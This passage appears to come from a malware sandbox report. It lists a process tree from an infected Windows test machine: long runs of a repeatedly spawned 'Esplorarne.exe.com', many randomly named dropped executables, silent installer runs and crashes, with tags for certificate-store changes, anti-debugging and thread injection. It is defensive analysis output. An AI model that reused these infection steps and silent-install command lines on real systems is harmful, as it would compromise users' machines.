        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        535⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        536⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        537⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        538⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        539⤵
        
        PID:7232
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        540⤵
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        541⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        542⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        543⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        544⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        545⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        546⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        547⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        548⤵
        
        PID:252
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        549⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        550⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        551⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        552⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        553⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        554⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        555⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        556⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        557⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        558⤵
        
        PID:7400
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        559⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        560⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        561⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        562⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        563⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        564⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        565⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        566⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        567⤵
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        568⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        569⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        570⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        571⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        572⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        573⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        574⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        575⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        576⤵
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        577⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        578⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        579⤵
        
        PID:7872
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        580⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        581⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        582⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        583⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        584⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        585⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        586⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        587⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        588⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        589⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        590⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        591⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        592⤵
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        593⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        594⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        595⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        596⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        597⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        598⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        599⤵
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        600⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        601⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        602⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        603⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        604⤵
        
        PID:8108
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        605⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        606⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        607⤵
        
        PID:7716
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        608⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        609⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        610⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        611⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        612⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        613⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        614⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        615⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        616⤵
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        617⤵
        
        PID:672
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        618⤵
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        619⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        620⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        621⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        622⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        623⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        624⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        625⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        626⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        627⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        628⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        629⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        630⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        631⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        632⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        633⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        634⤵
        
        PID:7788
    - - C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5292
      - C:\Users\Admin\Documents\Stuxhw6oWxYYkD8qlQbqhYbW.exe
        
        "C:\Users\Admin\Documents\Stuxhw6oWxYYkD8qlQbqhYbW.exe"
        6⤵
        
        PID:5772
      - C:\Users\Admin\Documents\vLMv9enxfOQSyOhkmUT9HBGQ.exe
        
        "C:\Users\Admin\Documents\vLMv9enxfOQSyOhkmUT9HBGQ.exe"
        6⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 320
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6688
      - C:\Users\Admin\Documents\HXce4NrG7u2T3ob0w0IpJDbM.exe
        
        "C:\Users\Admin\Documents\HXce4NrG7u2T3ob0w0IpJDbM.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2112
        
        C:\Users\Admin\Documents\HXce4NrG7u2T3ob0w0IpJDbM.exe
        
        C:\Users\Admin\Documents\HXce4NrG7u2T3ob0w0IpJDbM.exe
        7⤵
        
        PID:7020
      - C:\Users\Admin\Documents\8l_tYdoC1cFPrZAc12Kut153.exe
        
        "C:\Users\Admin\Documents\8l_tYdoC1cFPrZAc12Kut153.exe"
        6⤵
        
        PID:1068
      - C:\Users\Admin\Documents\A2MeOTLlVVy7eGu_Qu_gdUsq.exe
        
        "C:\Users\Admin\Documents\A2MeOTLlVVy7eGu_Qu_gdUsq.exe"
        6⤵
        
        PID:5348
        
        C:\Users\Admin\Documents\A2MeOTLlVVy7eGu_Qu_gdUsq.exe
        
        "C:\Users\Admin\Documents\A2MeOTLlVVy7eGu_Qu_gdUsq.exe"
        7⤵
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:6852
      - C:\Users\Admin\Documents\IOfzQKry13MDO41qVpDnSPol.exe
        
        "C:\Users\Admin\Documents\IOfzQKry13MDO41qVpDnSPol.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3876
      - C:\Users\Admin\Documents\tvwYgrb2f429aQuOGro1rbsa.exe
        
        "C:\Users\Admin\Documents\tvwYgrb2f429aQuOGro1rbsa.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
        
        C:\Users\Admin\AppData\Roaming\7008527.exe
        
        "C:\Users\Admin\AppData\Roaming\7008527.exe"
        7⤵
        
        PID:6396
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6396 -s 2316
        8⤵
        Program crash
        
        PID:6264
        
        C:\Users\Admin\AppData\Roaming\7514811.exe
        
        "C:\Users\Admin\AppData\Roaming\7514811.exe"
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:2212
        
        C:\Users\Admin\AppData\Roaming\8631789.exe
        
        "C:\Users\Admin\AppData\Roaming\8631789.exe"
        7⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Roaming\8387600.exe
        
        "C:\Users\Admin\AppData\Roaming\8387600.exe"
        7⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 2208
        8⤵
        Program crash
        
        PID:4612
      - C:\Users\Admin\Documents\GGJRwOOJKN2NO37pVUkFNxlL.exe
        
        "C:\Users\Admin\Documents\GGJRwOOJKN2NO37pVUkFNxlL.exe"
        6⤵
        
        PID:4044
      - C:\Users\Admin\Documents\xXPw8gzq7kyFNlvwvOjz3cm1.exe
        
        "C:\Users\Admin\Documents\xXPw8gzq7kyFNlvwvOjz3cm1.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:5740
        
        C:\Users\Admin\Documents\xXPw8gzq7kyFNlvwvOjz3cm1.exe
        
        C:\Users\Admin\Documents\xXPw8gzq7kyFNlvwvOjz3cm1.exe
        7⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 164
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6420
      - C:\Users\Admin\Documents\xFffrgVZ75SK5h08NUqgNu0o.exe
        
        "C:\Users\Admin\Documents\xFffrgVZ75SK5h08NUqgNu0o.exe"
        6⤵
        
        PID:4916
      - C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe
        
        "C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe"
        6⤵
        
        PID:1536
      - C:\Users\Admin\Documents\2aSLfjkYYD2DshoQd7V_7CdH.exe
        
        "C:\Users\Admin\Documents\2aSLfjkYYD2DshoQd7V_7CdH.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        
        PID:3232
      - C:\Users\Admin\Documents\QAkoadVPmpufjE2d8maWP2Qa.exe
        
        "C:\Users\Admin\Documents\QAkoadVPmpufjE2d8maWP2Qa.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:440
      - C:\Users\Admin\Documents\f4C7slnxa7XtCJZDRhYnwZ3y.exe
        
        "C:\Users\Admin\Documents\f4C7slnxa7XtCJZDRhYnwZ3y.exe"
        6⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 280
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:448
      - C:\Users\Admin\Documents\VI0TTJdNqDFHe87DIisPsVvC.exe
        
        "C:\Users\Admin\Documents\VI0TTJdNqDFHe87DIisPsVvC.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1668
      - C:\Users\Admin\Documents\xWLFeZ9BHAKzdr9cDlb9z8je.exe
        
        "C:\Users\Admin\Documents\xWLFeZ9BHAKzdr9cDlb9z8je.exe"
        6⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 276
        7⤵
        Program crash
        
        PID:7460
      - C:\Users\Admin\Documents\lDYC80QV081554Naoz9Vbsa4.exe
        
        "C:\Users\Admin\Documents\lDYC80QV081554Naoz9Vbsa4.exe"
        6⤵
        Executes dropped EXE
        
        PID:3644
        
        C:\Users\Admin\Documents\lDYC80QV081554Naoz9Vbsa4.exe
        
        "C:\Users\Admin\Documents\lDYC80QV081554Naoz9Vbsa4.exe" -q
        7⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 764
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7536
      - C:\Users\Admin\Documents\kgmy8bNqVHMbwHEvb_pGS9dA.exe
        
        "C:\Users\Admin\Documents\kgmy8bNqVHMbwHEvb_pGS9dA.exe"
        6⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\is-BB04P.tmp\kgmy8bNqVHMbwHEvb_pGS9dA.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BB04P.tmp\kgmy8bNqVHMbwHEvb_pGS9dA.tmp" /SL5="$204E6,138429,56832,C:\Users\Admin\Documents\kgmy8bNqVHMbwHEvb_pGS9dA.exe"
        7⤵
        
        PID:7012
        
        C:\Users\Admin\AppData\Local\Temp\is-OBU06.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OBU06.tmp\Setup.exe" /Verysilent
        8⤵
        Drops file in Program Files directory
        
        PID:6328
        
        C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
        9⤵
        Loads dropped DLL
